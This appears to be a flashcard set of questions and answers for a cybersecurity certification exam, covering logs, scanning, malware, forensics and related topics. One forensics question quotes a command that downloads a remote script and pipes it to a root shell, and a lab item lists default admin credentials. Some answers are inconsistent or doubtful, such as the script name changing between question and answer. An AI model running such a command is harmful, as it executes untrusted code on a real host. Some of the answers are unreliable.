Footprinting
Which of the following is true about log review?
For logs to be beneficial, they must be analyzed.
In order to test your wireless network security, you will be using aircrack-ng to try to gain access to the wireless network named CorpNet. You have used the airodump-ng utility to capture the output listed below. What is the next step if you are trying to complete the process quickly?
Force a full authentication handshake while you are monitoring with airodump-ng.
Which of the following methods for making data inaccessible is considered insufficient for preventing data recovery? (Select two.)
Formatting all partitions. Deleting or changing all partitions on the device.
The receptionist receives a call from a customer who asks for the customer support manager's name and email address to send them a thank you email. How should the receptionist proceed?
Forward the call to the help desk
A list of actions and objectives taken to mitigate risk is known as a:
Framework
Which site MOST often shows the newest vulnerabilities before other sources?
Full Disclosure
Which of the following works together by calling on each other, passing data to each other, and returning values in a program?
Function
Which of the following IoT components acts as a bridge between a device and the cloud?
Gateway system
Listen to simulation instructions You are the security analyst for a small corporate network. You want to proactively address issues to advert any problems on your system. In this lab, your task is run the Get-Eventlog command from PowerShell (Admin) to: Get a list of the current logs being capture on Office1 and answer Question 1. View the system log file and answer Question 2. View the application log file and answer Questions 3-5. View the security log file and answer Question 6.
Get a list of the current logs being capture on Office1. Right-click Start and select Windows PowerShell (Admin). Maximize the window for easier viewing. At the prompt, type Get-Eventlog -logname * and press Enter. In the top right, select Answer Questions. Answer Question 1. View the system log file and answer the question. Use the UP arrow key to reuse previous commands. From PowerShell, type Get-Eventlog -logname system and press Enter. Maximize the window for better viewing. Examine the last two entries. Answer Question 2. View the application log file and answer the questions. You may want to clear the screen using the CLS command. From PowerShell, type Get-Eventlog -logname application and press Enter. Examine the last entry. Answer Questions 3-5. View the security log file and answer the questions. From PowerShell, type Get-Eventlog -logname security and press Enter. Examine the entries. Answer Question 6. Select Score Lab.
You need to review the logs on a Windows machine that's experiencing a lot of crashes. From PowerShell, you plan on using the Get-Eventlog command but need to use an option to see which logs are available. What is the full command you should use?
Get-Eventlog -logname *
Having downloaded an .iso file for a project you are preparing for, and you want to validate that the file is from the vendor and hasn't been tampered with. You have downloaded the md5 hash signature for the .iso and need to validate the file. Which Windows PowerShell utility would you use?
Get-FileHash
Which of the following would BEST describe a multi-domain/subject alternative certificate?
Good for multiple domains and subdomains at a time
Each virtual machine created by a hypervisor is called a:
Guest
Which protocol does Windows Event Forwarding use to transfer events to a central computer?
HTTP
Which of the following attack types takes advantage of user input fields on a website?
HTTP response splitting
Threat actors can be divided into different types based on their methods and motivations. Which type of hacker usually targets government agencies, corporations, or other entities they are protesting?
Hacktivist
A hacker wants to check if a port is open using TCP Protocol. The hacker wants to be stealthy and not generate any security logs. Which type of port scan is BEST suited for this endeavor?
Half-open scan
Trusted Platform Modules and Hardware Security Modules are two examples of which hardware assurance?
Hardware roots of trust
A company is in the process of hiring Jill, a new technician. HR has checked the background and references of the candidate. What are some next steps in the hiring process that HR should take?
Have her sign an NDA and AUPs.
Which of the following NAC policies is MOST commonly implemented?
Health
You are the security analyst for your organization. During a vulnerability analysis, you have noticed the following: File attributes being altered Unknown .ozd files Files that do not match the existing naming scheme Changes to the log files Which of the following do these signs indicate has occurred?
Host-based intrusion
Which items should be included in data retention standards? (Select two.)
How data should be destroyed How long to store data
Misconfigurations occur throughout a network. What is the primary cause of misconfigurations?
Human error
If an employee is suspected of being an insider threat, he or she should be reported and mitigated through which department?
Human resources
Jake, a security analyst, has been asked to examine the malware found on the company's network. He decides the best place to start is to use a tool to translate the executable files to assembly language so he can understand what the malware can do and what it can impact. Which tool is the BEST choice for Jake to use?
IDA Pro
Which of the following statements is true regarding IDS and IPS?
IDS is a passive system; IPS is an active system.
Pedro, a security analyst, is tasked with monitoring a company's threat feed. Which of the following should he look for as part of his analysis?
IP addresses that might be malicious.
A hacker doesn't want to use a computer that can be tracked back to them. They decide to use a zombie computer. Which type of scan BEST describes what the hacker is doing?
Idle scan
How is magnitude measured by a team of subject matter experts when using qualitative analysis?
Impact
An attacker has captured the username and password from an executive in your organization through ARP poisoning during an on-path (man-in-the-middle) attack. Which of the following will be MOST likely to stop this form of attack in the future?
Implement HTTPS
After a sniffing attack has been discovered on an organization's large network, Jim, a security analyst, has been asked to take steps to secure the network from future attacks. The organization has multiple buildings and departments. Which of the following is the BEST step Jim could take to make the network more secure?
Implement switched networks.
According to OWASP, what is the number one risk for mobile devices?
Improper platform usage
Which security function reacts quickly and efficiently after an issue has been detected?
Incident response
The following information about an incident should be provided to stakeholders: What caused the incident and which security measures have been taken. What was the incident's financial, systemic, and reputational impact. How have policies and procedures been updated because of the incident. Which report should be used to share this information?
Incident summary
An attacker performs a successful SQL injection attack against your employer's web application that they use for daily business. What is the MOST likely reason the web application was vulnerable to attack?
Input fields in the comment forms were not being validated.
As an administrator, you may need to access internal company servers from home or from another location. Which of the following would be the most secure solution?
Install a dedicated jump server inside the firewall.
YuJin drove his smart car to the beach to fly his drone in search of aquatic animal activity. Which of the following operation systems are MOST likely being used by his car and drone?
Integrity RTOS and Snappy
John, a security analyst, conducted a review of a company's website. He discovered that sensitive company information was publicly available. Which of the following information sharing policies did he discover was being violated?
Internet
Troy, a security analyst, is tasked with reviewing company websites to see which type of information is being shared. Which sharing policy BEST describes this topic?
Internet
Which of the following BEST describes the isolation-based containment method?
Involves disconnecting a device, VLAN, or network segment from the rest of the network
A security analyst discovers that a system has been compromised through the building's thermostat. Which type of attack is this compromise from?
IoT Trojan
Which network-based Indicator of Compromise (IOC) could be present if you detect ongoing communication between two workstations on your network?
Irregular peer-to-peer communication
Which of the following BEST describes continuous intergration?
It allows all integration changes to be automated and placed back into a shared mainline.
Tristi, a community outreach employee, is looking to apply machine learning into her job. Which of the following might she use machine learning for as a way to further her company's goals?
It can help her tailor the company's social media feed.
When performing an investigation into an intrusion through a Linux box on your network, you find the following command in /root/.bash_history: curl http://5.6.7.8/~/324526.sh | /bin/sh. What did this command do?
It executed the 334526.sh script locally as the root user.
Adaptive hashing adds an extra layer of security to a hash value through which of the following processes?
It feeds the hashed output back into the function a predetermined number of times.
A DNS host has stopped responding to nslookup requests. You verify the machine is running, and a check of network traffic shows a very large amount of data being transferred from the machine to multiple hosts outside the company. You ping the machine and receive the following response. What might explain the server's situation?
It has an open resolver and is being overwhelmed by a distributed reflection denial-of-service (DRDoS) attack.
Which of the following BEST describes the Qualys Vulnerability Management assessment tool?
It is a cloud-based service that keeps all your data in a private virtual database.
While performing a SoftPerfect scan as part of a regular machine audit, you notice that one of the machines is sharing the Users directory. When you double-click the share, you are taken directly to the Explorer pop-up displayed below. What does that probably tell you about the Student-PC host?
It is allowing NULL sessions.
Which of the following is an advantage to having self-contained components in SOA?
It is easier to maintain than interdependent services.
You find a file that has the following as the first line of what appears to be a log file. What does the dc3dd command do in this instance?
It is used to create images of devices for forensic review.
As you walk by a coworker's workstation, you see the following on the screen. What is the Dnscat2 DNS server typically used for?
It is used to execute other commands on a remote host.
How can a legal hold be helpful in digital forensics?
It protects data from being altered.
Which of the following is the BEST reason to choose a serviced-based assessment solution?
It provides a protection level that a professional provides through knowledge.
Why does splitting DNS into internal and external groups make sense.
It provides an added layer of security.
You are using nmap to locate all the IoT devices on your network. You use the following command to perform the scan. What does the -A do?
It scans for OS and software version used.
Which of the following BEST describes an organization validation?
It shows a padlock icon next to the company's name.
Which of the following statements BEST describes VDI?
It starts a minimal operating system for a remote user to access.
You are auditing your network for online hosts and open ports. You are using nmap to perform this task. There are notes left from a previous administrator listing the command that they used to perform a previous audit, but there is no explanation as to what it does. You try the command and get the following output. What did the nmap -O 192.168.122.84 command do?
It tried to determine which operating system was running on the host.
It's a good idea to disable SNMP when not in use to prevent a possible attack. What is SNMP used for?
It's used for device management and reporting.
Kim wants to send a secure message to Tyler. She adds a secret key to her message data before she applies the SHA1 hashing algorithm. Tyler has the secret key, so he knows whether Kim's message has been altered when it arrives. Which of the following is the process Kim followed?
Keyed hashing
Which of the following is the term used for an IP address that's been flagged for suspicious or malicious activity?
Known bad
Which of the following uses the TCP/IP stack and is effectively employed to slow down the spread of worms, backdoors, and similar malware?
Layer 4 tarpit
Your company has just completed social engineering training for all employees. To test the training's effectiveness, you have been tasked with creating a simple computer virus that creates a file on a user's desktop. Approximately how long will you need to create the virus?
Less than one day
Post-incident activities provide an opportunity to learn from experiences. The feedback gathered in this phase can be used to improve on existing security policies and procedures. A good way to gather this information is to hold a meeting to discuss the incident and the incident response. What is this meeting called?
Lessons learned
What is the FIRST step in vulnerability scanning penetration?
Locate the live nodes in the network. You can do this using a variety of techniques, but you must know where each live host is.
Which of the following are benefits of a BYOD policy? (Select three.)
Lower costs Increased productivity Work flexibility
Which of the following is a method of attack that is intended to overload the memory of a network switch, forcing the switch into open-fail mode and thereby causing it to broadcast incoming data to all ports?
MAC flooding
An attacker has, through reconnaissance, discovered the MAC address to Sam Black's computer. Sam is a user in your network with admin privileges. The attacker uses a software tool that allows him or her to mimic Sam's MAC address and use it to access your network. Which type of attack has the attacker performed?
MAC spoofing
You entered your password on a website and are sent a code to your cell phone. Which of the following is this an example of?
MFA
Mary has discovered that someone hacked in and stole personal files from her Google Drive. Which type of attack was MOST likely carried out against her?
MITC
As you gather evidence for an investigation, you need to make a copy of a hard disk drive that includes all visible files as well as any unallocated space. It needs to include any deleted files, metadata, or timestamps. Which of the following options would be BEST for this task?
Make a forensic copy of the drive.
You are tasked with updating the company policy for tablets and phones to make them harder to penetrate if they fall into the wrong hands. Which of the following would be good practices to consider? (Select two.)
Make passcodes or passwords mandatory after a short period of time. Ensure Simple Passcode is turned off.
You are creating an input validation component for a digital form. Which type of protection should you be building into it?
Make sure that no one can input something malicious into the form.
A company has a list of high-value assets (HVAs). As a security analyst, what must you do to help protect those assets? (Select two.)
Make sure the response team can easily identify the HVAs. Make sure an incident involving one of the HVAs is always high priority.
In monitoring you company's email for security, you notice that several employees have been sent emails with an attachment that includes a virus. The virus in this email is considered which of the following?
Malicious payload
File fingerprinting, scanning, string searches, and disassembly are all used to identify malware. When these techniques are used, what is the identifying information called?
Malware signature
Which security control category controls system oversight?
Managerial
The contents of memory are very complex. Once you have moved memory content to a removable drive, what will you need to use to understand the contents?
Memory analysis tool
As part of a push by IT to create consistent policies on Windows machines, you are working in PowerShell and have created a binary policy file that covers applications and virus scanning policies. You have another binary policy file called MyPolicy.bin, which you want to use as well. It covers other portions of your company's new Windows policy. What do you need to do to implement both binary files?
Merge the two policies into a single policy file.
Which of the following tools would you use to perform a SYN flood attack?
Metasploit
Which tool is used as a framework for exploiting vulnerabilities and conducting discovery using predefined scripts?
Metasploit
Which layer in the IoT architecture covers the processes that happen in the cloud?
Middleware
While performing a password audit on a Windows machine in your organization with L0phtCrack, you receive the following results. Based on what you see below, which two accounts should worry you the most? (Select two.)
Mihai Administrator
Which type of web application is designed to work on Android or iOS?
Mobile
What are the policies organizations use to maintain security on mobile devices called?
Mobile device management
Which Bluetooth security mode uses Diffie-Hellman techniques for key exchange and generation?
Mode 4
A criminal offers a bribe to an employee at your company who has access to sensitive data, asking the employee to transfer the data to the criminal's computer. What are some actions you can take to help protect against data loss from insider threats like this one?
Monitor who is requesting and sending data, monitor employee's behavior, and store all sensitive data in one location.
Which of the following is the last phase of the vulnerability management life cycle?
Monitoring
Which of the following is used to define minimum security requirements a device must meet before it can connect to a network?
NAC
A security analyst was alerted in real time that there is unusual incoming traffic on the network. The traffic was not and could not be prevented or altered by the program. Which type of program MOST likely sent the alert to the security analyst?
NIDS
Threat actors can be divided into different types based on their methods and motivations. Which type of hacker works for a government and attempts to gain top-secret information by hacking other governments' devices?
Nation-state
John is a security analyst, and he needs the following information about a current exploit: Fix information Impact rating Severity score What is his BEST resource?
National Vulnerability Database
Kjell wants a network scanning tool that gives remediation solutions to found vulnerabilities. He also wants to be able to create customized scan jobs that run during off hours and can scan multiple network technologies. Which application is BEST for him?
Nessus
Troy, a security analyst, is looking for a vulnerability scanning tool for internal use. His boss has told him to find the industry standard tool. Which tool BEST fits his mandate?
Nessus
John, a security analyst, needs a network mapping tool that will diagram network configurations. Which of the following BEST fits this category?
NetAuditor
Which of the following sends you an alert when an automated port scan is detected?
Network intrusion system
URL and DNS monitoring, flow and packet analysis, and DGA monitoring are all methods to secure data in which of the following areas?
Network monitoring
A mailing list that often has the newest vulnerabilities listed before they show up on government-sponsored resources is operated by whom?
Nmap
When decommissioning assets, which of the following MUST be recycled?
Notebook batteries CRT monitors
Which protocol is used in the Bluetooth pairing process?
OBEX
You are the security technician for your organization. You need to perform diagnostics on a vehicle's subsystems for security purposes. Which of the following would you use to access the vehicle's subsystems?
ODB-II
Troy, a security analyst, needs a web application scanner that is extensible and that evaluates each web application individually. Which tool is BEST for his needs?
OWASP ZAP
Which web application scanner uses an on-path (man-in-the-middle) proxy design?
OWASP ZAP
Where should VM administration occur?
On the hypervisor and virtual machine
Where are network device log files stored by default?
On the local device
Why is security for VMs more important than security for a physical machine?
One bad configuration could be replicated across your network.
A security analyst needs an infrastructure vulnerability scanner that's flexible enough for low- and high-level protocols, is updated daily with new vulnerabilities, and allows for performance tuning. The company is on a tight budget, so it needs to be open source. Which tool is the BEST option?
OpenVAS
Which of the following best describes the components of an ICS network?
Operational technology
During which phase of the IT asset life cycle do you perform maintenance, such as installing system updates and patches?
Operations
Which type of information contains intellectual property?
Operations
Which of the following are considered DNS hardening techniques?
Optimize resources to their full potential. Clean up out-of-date zones. Learn about your web server software.
An incident that impacts a company's primary functions to the point that it cannot continue with business as usual is considered to have which type of impact?
Organizational impact
Which of the following should be included in a policy? (Select two.)
Outline for roles and levels of authority Definition of security incidents
Which of the following types of attacks are IoT devices most vulnerable to?
Overflow
Which of the following BEST describes the type of network Bluetooth devices create?
PAN
Which of the following HTTP request/response types is used to request that the web server send data using HTML forms?
POST
Which cloud service model would MOST likely be used by a software developer?
PaaS
What is the process of connecting two Bluetooth devices together called?
Pairing
Which type of test simulates an insider threat by giving the tester partial information about the network and computer systems?
Partially known
Allen's company has raised concerns about network information that can be observed without a hacker being discovered. Which of the following BEST describes the type of assessment that could be used to operate in this manner?
Passive
Which of the following should be performed first to determine WAP placement?
Passive survey
During pairing, what is exchanged between two devices to confirm the correct devices are being paired?
Passkey
When analyzing memory consumption for indicators of compromise, what information is the most useful?
Per-process memory usage
PII, if exposed or captured by attackers, can be used to exploit and blackmail. What is PII?
Personally identifiable information
Which of the following mobile data acquisition types copies the entire flash memory, including deleted files and data remnants?
Physical acquisition
Which devices are responsible for forwarding packets in a virtual network?
Physical networking devices
Which of the following is one of the five phases of the incident response life cycle?
Preparation
In actively defending against SQL injection attacks, you create queries that have placeholders for values from your users' input. Which of the following SQL injection countermeasures did you implement with these queries?
Prepared statements
An employee not authorized to release news to the press speaks to a reporter about upcoming management changes. Which sharing policy BEST explains why this shouldn't happen?
Printed materials
As you review your network's storage shares to ensure permissions have been securely defined, you come across the following list of users and permissions set to a share on one of your key storage locations. Two of the regular users should have Read and Write permissions (Bob Barker and Jennifer Banks). The two other individuals should not (Joseph Lange and Bob Marley), who were both given access during a specific project but should've had their Write permissions removed afterward. What is it called when permissions are given for a task but then never removed when they are no longer required?
Privilege creep
During which phase of the IT asset life cycle do you determine what impact a new asset will have on the existing network and users?
Procurement
A company decides to purchase and administer tools on their own. Which type of assessment solution are they using?
Product-based assessment
John's company needs a product to fix found network vulnerabilities. This product needs to run inside their firewall without help from an outside professional. Which of the following BEST describes this type of assessment solution?
Product-based assessment
The network IDS has sent alerts regarding malformed messages and sequencing errors. Which of the following IDS detection methods is most likely being used?
Protocol
Which of the following attacks is a SYN flood attack an example of?
Protocol DDoS
You discover that your network is under a DDoS SYN flood attack. Which of the following DDoS attack methods does this fall under?
Protocol DDoS
All incident-related questions from outside the organization should be handled through which department?
Public relations
Shelley, a programmer, wants to make sure her code works well under rigorous conditions. Which of the following activities would be MOST appropriate to help her run a stress test on her code?
Put an enormous amount of data into the software to see if it has problems.
Alex, a security specialist, is using an Xmas tree scan. Which of the following TCP flags will be sent back if the port is closed?
RST
What is the primary difference between reconnaissance and enumeration?
Reconnaissance is passive discovery; enumeration is active discovery.
Which of the following occurs during the deployment phase of the IT asset life cycle?
Recording of asset tag information
Which of the following is an attack where injected script is immediately mirrored off a web server when a user inputs data in a form or search field?
Reflected cross-site scripting
A security analyst is concerned about flaws in the operating system being used within their company. What should their FIRST step be to remedy this?
Regular system patches
During which of the vulnerability life cycle management phases do you implement the controls and protections from your plan of action?
Remediation
You are testing a compromised machine on an isolated network, and you find a web server running on an open port. When you browse to it, you see the following information. Which kind of infection does this computer have?
Remote Access Trojan
Which of the following blackhole implementations sends traffic going to a specific destination to the blackhole?
Remote blackhole filtering
Which of the following would be considered reducing the attack surface?
Remove all unneeded programs.
Which type of honeypot is a high-interaction honeypot that is deployed by research institutes, governments, or military organizations to gain detailed knowledge about the actions of intruders?
Research honeypot
Which SIEM function provides long-term storage of collected data to meet government compliance requirements.
Retention
Using the Group Policy Management tool on your Windows server, you are going to create a new group policy using a binary policy file you recently created. What do you do next?
Right-click on the domain name CorpNet.xyz and click Create a GPO in this domain.
Which of the following is a data protection approach that seeks to protect data at the file level?
Rights management
Monitoring MAC addresses could help detect which network-based Indicator of Compromise (IOC)?
Rogue device
Which type of malware can infect the core of an operating system, giving an attacker complete control of the entire system remotely, including the ability to change code?
Rootkit
Some Remote Access Trojans (RATs) install a web server to allow access to the infected machine. Others use a custom application that is run on the remote machine, such as ProRAT. Once infected with this custom application, which other types of infections are possible with this tool installed? (Select two.)
Rootkit Ransomware
Part of a penetration test is checking for malware vulnerabilities. During this process, the penetration tester needs to manually check many different areas of the system. After these checks have been completed, which of the following is the next step?
Run anti-malware scans
Which of the following is used to monitor and control PLC systems?
SCADA
Mary has been receiving text messages that contain links to malicious websites. Which type of attack is Mary a victim of?
SMiShing
Taylor is a manager who is trying to find a way to get computers with different operating systems to easily interact with each other. Which of the following should she use to accomplish this?
SOAP
Which of the following tools allows a domain owner to specify email servers that can send an email in the domain, and which servers are not allowed to send emails?
SPF
The field in the image below is supposed to return just the username associated with the user ID (a number). The output in the image, however, includes more information, including the username running the database. What is being exploited here?
SQL injection
Which of the following cyberattacks involves an attacker inserting their own code through a data entry point created for regular users in such a way that the server accepts the malicious code as legitimate?
SQL injection
Which of the following types of attacks involves constructing malicious commands with the goal of modifying a database?
SQL injection
You are looking for a vulnerability assessment tool that detects vulnerabilities on mobile devices and gives you a report containing a total risk score, a summary of revealed vulnerabilities, and remediation suggestions. Which of the following vulnerability assessment tools should you use?
SecurityMetrics Mobile
Which of the following containment methods divides the network into subnetworks that are unable to communicate with each other directly?
Segmentation
Restarts, crashes, frozen applications, and intermittent stopping are examples of which application-based indicator of compromise (IOC)?
Service interruption
The following steps describe the process for which type of attack? Locate and sniff an active connection between a host and web server. Monitor traffic to either capture or calculate the session ID. Desynchronize the session. Remove the authenticated user. Inject packets to the server.
Session hijacking
You have just finished creating several network polices using the Network Policy Server (NPS) as shown in the image. Vera belongs to the Sales, Marketing, and Research groups. What kind of access will Vera have?
She will be granted access because she belongs to the Sales group, and that group is evaluated first.
Which of the following is the BEST search engine for IoT devices?
Shodan
You have a set of DVD-RW discs that were used to archive files from your latest project. You need to prevent the sensitive information on the discs from being compromised. Which of the following methods should you use to destroy the data?
Shred the discs.
Frequently, the reason a mobile device is compromised is because a user installed an app from an unofficial source. What is the name for this type of installation?
Sideloading
Which of the following mobile device attacks targets vulnerabilities in a device's S@T browser?
Simjacker
A manager is asking questions about why you must use a disk wiping utility before donating old hardware to a charity. How would you answer that question?
Simply deleting data using a workstation's standard tools does not really remove data from the hard drive.
An attack targets ICMP protocol vulnerabilities and is conducted by creating ICMP echo request packets using the spoofed IP address of the target machine. It then sends packets to the broadcast address network, which results in numerous devices responding with replies to the target's IP address, disabling it. Which type of attack is this?
Smurf DDoS attack
You configure your switches to shut down a port immediately after it being accessed by an unauthorized user. Which type of attack are you trying to prevent?
Sniffing
Any attack involving human interaction of some kind is referred to as which of the following?
Social engineering
Over time, changes in the way people use networks have complicated protecting a network against security threats. Which of the following trends has increased the need for security? (Select two.)
Social networking Cloud computing
You are examining a company executive's laptop after they complained that someone was leaking confidential information to the internet. You type Ctrl+Alt+Shift+K and the following interface pops up. What has happened to the executive's machine?
Someone has installed a keylogger on it.
When you create an event subscription, events are sent from one computer to another. What is the computer that generated the event called?
Source computer
You are instant messaging a coworker, and you get a malicious link. Which type of social engineering attack is this?
Spim
William understands the need to keep internal and external DNS separate as a security countermeasure. Which term BEST describes this countermeasure?
Split DNS
Which of the following attacks involves modifying the IP packet header and source address to make it look like they are coming from a trusted source?
Spoofing
Which method of malware analysis includes matching signatures, analyzing code without executing it, disassembly, and string searching?
Static analysis
An attacker who gains access to your system can cause a lot of damage with a wide variety of malicious activities. Which of the following are malicious activities an attacker might use against your system? (Select two.)
Steal confidential information. Install malware on the system.
Which of the following BEST describes a federation?
Stores a user's credentials so that trusted third parties can authenticate using those credentials without actually seeing them.
Your company president suspects that one of the employees has been embezzling money from the company and depositing it in their own bank account. Which of the following methods could you use to find evidence of this action?
String search
After detecting a security incident that may have left your systems vulnerable to outside attack, you determine that a change is necessary. You want to reduce the impact of the threat as soon as possible, but you also want to follow your organization's change management procedures. Which of the following would be the BEST approach to this scenario?
Submit a high-priority change request and wait for the necessary approvals before making changes to the system.
Business email compromise attacks have been increasingly waged against corporations' email systems. Attackers exploit an auto-forwarding email vulnerability to set emails that contain keywords to be redirected to their own inboxes. Which of the following BEST helps protect against this form of attack?
Sync email accounts settings.
You are configuring your pfSense security appliance, which will provide firewall, DNS, and DHCP services for your users. You are currently working on configuring DNS servers. Which menus would you use to make the required changes?
System > General Setup
Which type of intelligence helps security professionals respond to incidents or make decisions on the spot?
Tactical intelligence
After creating a new case in Autopsy and selecting an image from a hard drive to inspect, you select the appropriate ingest modules, and the analyze process is completed. What should you look at next?
The Results section, which gives an overview of the process.
The following header is seen when inspecting traffic from a web server to a browser client. What might a security consultant recommend be changed to reduce risk for the web server?
The administrator can disable the banner in IIS
An attacker may poison the DNS by making changes to an organization's DNS table. Why might an attacker take this action?
The attacker can redirect users to a malicious website.
You have a file with sensitive data. It has a hash through a CHF. When you get to the office in the morning and access the file, you notice that the hash is different than it was the day before. What do you know about the file?
The file has been tampered with.
You have been asked to crack the password on a zip file for the CEO. The employee who sent it to the CEO told them the password over the phone, but the CEO forgot it, and the employee who knows the password is unavailable for the next week. You are using John the Ripper on Linux to recover the password. You transferred the file to your Linux machine and ensured that John the Ripper is installed, but you receive the following message. Which step did you skip?
The hash has to be determined for the file.
Which of the following can contain a wealth of information that can be used to determine the authenticity of an email?
The header block
Which of the following is true about confidence levels in the intrusion analysis Diamond Model?
The higher the value, the higher the confidence.
Which of the following indicate the email highlighted below may be suspicious? (Select two.)
The link in the email is to an IP address; it is not to Microsoft's website. There are several spelling mistakes in the email.
While reviewing a machine that a user has reported for strange behavior, you decide to use ipconfig to review its network configuration. Afterward, you see the output shown below. No changes were made manually to the machine's network configuration and all IP configuration is automatic. The proper default gateway for this network segment is 10.10.10.1. Which of the following would explain the output shown?
The machine in question is being targeted by a DHCP on-path (man-in-the-middle) attack.
A recently patched Windows machine on your network no longer responds to ping, but you have confirmed it is otherwise functioning normally and servicing incoming connections to other machines on the network. No other changes were made to the machine or its connection to the network. When you use hping3, you get the following output. Which of the following BEST explains that behavior?
The machine's firewall is blocking ICMP.
Which of the following BEST describes scan information?
The name of the scanning tool, its version, and the network ports that have been scanned.
Which of the following roles is often outsourced in risk training scenarios?
The offensive team
Which of the following BEST describes an unknown penetration test?
The penetration tester has no information regarding the target or network.
You are using Burpsuite to evaluate a new employee portal that will be put into production soon. Based on the highlighted POST traffic and the information in the bottom pane, what can you conclude?
The portal is using HTTP and login information is probably being transmitted in cleartext.
You have chosen to use a popular Software as a Service (SaaS) cloud storage solution for user data on each company workstation. How much responsibility does your company typically have for the security of the files you store with this SaaS solution?
The provider is supposed to provide all security in a SaaS model.
SNMP uses agents that communicate with network devices via which of the following?
The public community that provides read-only access to device configuration.
While configuring a perimeter firewall on your network using pfSense, you created the rule shown in the image. The intent of the rule is to allow secure traffic coming from the internet through the firewall and to the web server (172.16.1.5) in the DMZ. What have you configured incorrectly?
The source and destination ports should be HTTPs.
Drag the possible detection state to the matching description:
The system accurately detected a threat. True-Positive The system accurately detected legitimate traffic and did not flag it. True-Negative The system flagged harmless traffic as a potential threat. False-positive Malicious traffic is flagged as harmless. False-Negative
A new desktop was put into production. The system administrator created a new user and disabled the local administrator and guest accounts. Which vulnerability was introduced when the system was powered on?
The system was not updated or patched.
You are testing for password vulnerability and used the command below to probe a Linux machine on your network. You then received the output below in return. Prior to the test, you scanned the IP to ensure that the SSH port was open. Now when you scan the same IP from a different machine, you see it's still open and that SSH connections are accepted from other IP addresses. Which of the following would MOST likely explain what has happened?
The target server is using Fail2Ban and has started refusing connections from the source IP address.
Which method does degaussing use to securely dispose of data?
The use of a powerful magnetic force to wipe data completely from a drive.
Which of the following BEST describes signing in without single sign-on?
The website must have its own database of user credentials.
Which of the following BEST describes signing in with single sign-on?
The website's authentication server verifies the credentials.
While using Wireshark for some network traffic analysis, you filter for DHCP traffic and see the following information. What conclusion can you make?
There are two DHCP servers answering requests.
While reviewing your pfSense appliance logs, you notice the following.
There are two DHCP servers that are responding to DHCPREQUEST events.
Listen to simulation instructions You are the security analyst for a small corporate network. To be more proactive in your defense against possible attacks, you want to perform passive reconnaissance on your network using pfSense's logging capabilities. You are concerned that attackers may be attempting to gain access to your network, especially through on-path attacks (man-in-the-middle attacks). In this lab, your task is to: Sign in to pfSense using:Username: adminPassword: P@ssw0rd (zero) Examine the log files to see if an on-path attack has occurred. Answer the question.
There are two DHCPACK entries with the same IP and MAC address.
You are working with ACLs on your Windows machine and have created some complex permissions with many users and groups defined. Now you want to back up those permissions so that they can be restored in the event of a system failure. What is missing from the below command?
There has been no file name specified.
While performing an audit of your company's network, you use Wireshark to sniff the network and then use the tcp contains password command to filter and see the results below. What might you conclude based on these findings?
There is a website that someone on your network logged into that has no encryption.
While analyzing network traffic on your company network, you see the following in Wireshark. What appears to be happening?
There is an ICMP flood attack.
Which of the following is a benefit of microservices?
They function independently of each other. If one service fails, the application can keep working.
Mary is working on a software development project, and her manager reminds her that the team needs to focus on software assurance. Which of the following BEST describes software assurance?
To create software that customers find reliable
Which of the following are uses for the sqlmap utility? (Select two.)
To determine SQL server parameters, including version, usernames, operating systems, etc. To detect vulnerable web apps
An attacker has performed a privilege escalation attack on your system. Which of the following is MOST likely the goal behind this attack?
To lay a foundation for later.
In what order are rules in an ACL processed?
Top to bottom
Damage to an organization's reputation and other non-cost incident consequences are considered which type of impact?
Total impact
Which of the following BEST describes steps in an active defense against DDoS attacks?
Train staff for warning signs, allow only necessary outside access to servers, and configure network devices' preexisting mitigation settings, like router throttling.
You are a security consultant and have been hired to evaluate an organization's physical security practices. All employees must pass through a locked door to enter the main work area. Access is restricted using a biometric fingerprint lock. A receptionist is located next to the locked door in the reception area. They use an iPad application to log any security events that may occur. They also use their iPad to complete work tasks as assigned by the organization's CEO. What could you do to add an additional layer of security to this organization?
Train the receptionist to keep his or her iPad in a locked drawer
Which program did the U.S. Department of Defense set up to determine the authenticity of a hardware source?
Trusted Foundry Program
Your boss has requested that you ensure that the chips in all new hardware purchases have not already been infected with malware or other malicious software. Which feature should you look for in your devices?
Trusted Platform Module
Which IPsec method is the most used and protects an entire packet by wrapping it with a new IP header, encrypting it, and then sending it on to the receiving host?
Tunnel mode
Which of the following is the practice of gathering insight about network events based on users daily behaviors to create a baseline for anomaly detection?
UEBA
Pop-up windows and unusual error messages are often which type of IOC?
Unexpected output
If you are testing software without looking at the backend code, which kind of testing are you engaging in?
Unknown testing
You are in the process of configuring pfSense Suricata as your intrusion detection and prevention system (IDS/IPS). You have just finished configuring the Global Settings and have enable the installation of the ETOpen Emerging Threats rules. To get these rules, select the option tab you must use next.
Updates
One of the older Windows machines on your network has been re-installed. You want to turn on BitLocker to encrypt the system volume, but you receive an error message that the device doesn't have a Trusted Platform Module (TPM) and can't use BitLocker. You know that several other identical machines have BitLocker enabled. What do you need to do to get BitLocker working on this hardware?
Use a Group Policy option to allow BitLocker without the TPM.
You want to properly dispose of papers with sensitive content. You want to ensure that it's nearly impossible for a dumpster diver to put the information back together. What should you do?
Use a crosscut shredder
A machine on your network has been infected with a crude ransomware application. You have obtained a copy of the software and are reverse engineering it with Ghidra. You are hoping that the password for the software is hard-coded into the application. You are presented with the default view in Ghidra, which displays the assembly (machine) code for the application. What might you do next to locate the password?
Use a string search looking for "password" and its variants.
You have implemented a regular backup schedule for a Windows system, backing up data files every night and creating a system image backup once per week. For security reasons, your company has decided not to store a redundant copy of the backup media at an off-site location. Which of the following would be the best backup and storage option?
Use incremental backups and store them in a locked, fireproof safe.
Working from the command line in Kali Linux, you are auditing Bluetooth device security on your network. You have used hciconfig to enable your laptop's Bluetooth device and hcitool to scan for available devices. What is the next step?
Use l2ping to determine if a listed Bluetooth device is in range for pairing.
After having downloaded and installed pfblockerng for your pfsense firewall, you are configuring what sites to block. How do you block lists of websites you don't want the employees to access?
Use lists found on the internet that are formatted for pfblockerng.
Match each attack to the appropriate defense:
Use rigid specifications to validate all headers, cookie query strings, hidden fields, and form fields. XSS Attack Perform input validation. Do not permit dangerous characters in the input. Injection Attack Log off immediately after using a web application. Clear History after using a web application, and don't allow your browser to save your login details. CSRF Attack Secure remote administration and connectivity testing. Perform extensive input validation. Configure the firewall to deny ICMP traffic. Stop data processed by the attacker from being executed. DoS Attack Update web servers with security patches on a regular basis. Limit access to the secure areas of the website. Directory Traversal
Which of the following is beta testing also known as?
User acceptance testing
How is probability determined using quantitative analysis?
Using the ARO calculation
Which of the following can be run as traditional software on a virtual machine?
VFA
You have just run the nmap command shown below. Which vulnerabilities were found on the target firewall?
VPN
